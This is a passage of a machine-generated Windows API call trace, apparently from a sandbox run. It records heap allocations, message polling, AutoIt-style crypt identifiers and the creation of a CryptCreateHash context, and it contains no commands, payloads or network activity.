[0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0147.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0147.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0147.461] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.462] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0147.462] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0147.462] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.462] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.462] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.462] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.462] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0147.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0147.462] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.463] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.463] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.463] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0147.463] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0147.463] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0147.463] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0147.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0147.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0147.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0147.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0147.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0147.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.465] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0147.465] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0147.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0147.465] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0147.466] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.466] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0147.466] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.466] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0147.466] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0147.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0147.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.467] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0147.467] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0147.467] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0147.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0147.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0147.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50ba8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0147.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.468] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0147.468] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0147.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0147.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0147.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0147.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 